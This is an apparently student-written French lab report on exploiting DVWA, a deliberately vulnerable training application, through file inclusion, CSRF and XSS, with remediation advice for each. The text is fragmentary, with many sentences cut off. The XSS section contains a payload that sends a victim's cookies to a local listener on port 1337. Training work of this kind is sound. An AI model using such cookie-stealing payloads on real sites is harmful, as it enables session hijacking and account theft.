TP Attaques Sur DVWA
TP Attaques Sur DVWA
TP Attaques Sur DVWA
Bendaouia Hajar
Elhallaoui Youess
Lahlali Ibtissam
fichiers arbitraires sur le serveur web. Dans ce rapport, nous allons discuter de la
1. Description de la vulnérabilité:
La vulnérabilité d'inclusion de fichier (élevée) est présente dans l'application DVWA, qui
est une application web vulnérable conçue pour être exploitée à des fins de test. La
vulnérabilité permet à un attaquant d'inclure des fichiers arbitraires sur le serveur web.
2
b. Utilisez un proxy web BurpSuite pour intercepter la requête.
3
d. Soumettez la requête modifiée et observez la réponse.
3. Impact de la vulnérabilité:
code arbitraire sur le serveur web, voler des informations sensibles ou lancer d'autres
4. Correction:
Pour corriger la vulnérabilité, l'application doit mettre en œuvre une validation et une
également limiter l'accès aux fichiers et répertoires sensibles sur le serveur web.
4
Conclusion:
Les vulnérabilités d'inclusion de fichier sont une menace importante pour les
peut être exploitée pour exécuter du code arbitraire sur le serveur web, voler des
une validation et une désinfection appropriées des entrées fournies par l'utilisateur
5
II. Cross-Site Request Forgery (CSRF) :
La vulnérabilité de type Cross-Site Request Forgery (CSRF) est une faille de sécurité qui
permet à un attaquant de forcer un utilisateur à effectuer des actions non désirées sur
un site web, en utilisant des requêtes HTTP forgées. Cette faille peut avoir des
1. Description de la vulnérabilité :
L'application web a été testée pour les vulnérabilités de type CSRF. Nous avons détecté
une vulnérabilité de niveau "low" qui permet à un attaquant de forger une requête
HTTP pour effectuer une action non désirée sur le site web. Cette vulnérabilité est due à
2. Exploitation de la vulnérabilité :
Un attaquant peut exploiter cette vulnérabilité en créant un site web malveillant qui
contient un formulaire avec des champs masqués qui pointent vers une URL de
l'application web. Lorsque l'utilisateur visite le site web malveillant, le formulaire est
automatiquement soumis avec des valeurs préremplies, sans que l'utilisateur en soit
conscient.
6
3. Étapes pour reproduire la vulnérabilité :
7
c. Changer le mot de passe
8
e. Le mot de passe changé
4. Impact de la vulnérabilité :
utilisateur sans son consentement, ce qui peut entraîner des conséquences graves pour
l'utilisateur et l'application web. Par exemple, l'attaquant peut modifier les informations
données importantes.
5. Recommandations :
Pour corriger cette vulnérabilité, il est recommandé de mettre en place une protection
CSRF qui génère un jeton unique pour chaque formulaire et vérifie si le jeton soumis
recommandé de valider et filtrer toutes les entrées utilisateur, de mettre en place une
9
Conclusion :
web peut permettre à un attaquant de forcer un utilisateur à effectuer des actions non
désirées sur le site web. Il est recommandé de corriger cette vulnérabilité en mettant en
place une protection CSRF et en suivant les recommandations de sécurité pour réduire
10
III. Failles XSS ( Cross-site Scripting ):
Est une vulnérabilité particulièrement répandue dans les applications web. Elle fait
partie de la catégorie des vulnérabilités par injection de code au même titre que
L’attaquant injecte du code malveillant via les paramètres d’entrée côté client. Ainsi,
il peut potentiellement réaliser toute action via le navigateur web d’une victime, par
Il existe trois types d’attaques XSS: les attaques XSS stockées (stored XSS), les
attaques XSS reflétées (reflected XSS) et les attaques XSS basées sur le DOM
(DOM-based XSS).
Ce type d’attaque est aussi appelé XXS local. En chargeant une de ces adresses
URL manipulées, un code malicieux est exécuté sans vérification grâce à une faille
présente dans un script côté client. Au contraire des XXS persistants et réfléchis, le
serveur Web n’a ici pas sa place dans le processus. Cette variante de script porte
également atteinte aux sites Web statiques, qui prennent ce langage de script en
charge.
réfléchis : l’utilisateur ouvre un lien. Après avoir cliqué dessus, un script lit la valeur
d’argument de l’URL et exécute le code de script qu’il contient. C’est ainsi que les
1. Création de serveur local en utilisant PYTHON qui écoute le port 1337 comme
suivant:
<select><img src/onerror="window.location='http://127.0.0.1:1337/?cookie=' +
document.cookie">
12
3. Passage
Dans cette version Impossible, il y a une couche de sécurité qui sert à tester si
13
Comment se protéger des failles XSS ?
Pour prévenir les attaques XSS, il faut implémenter des mesures de protection pour
Pour ce faire, il s’agit de remplacer les caractères spéciaux par des valeurs
Cela signifie que l’ensemble des données doit passer par un filtre qui élimine les
14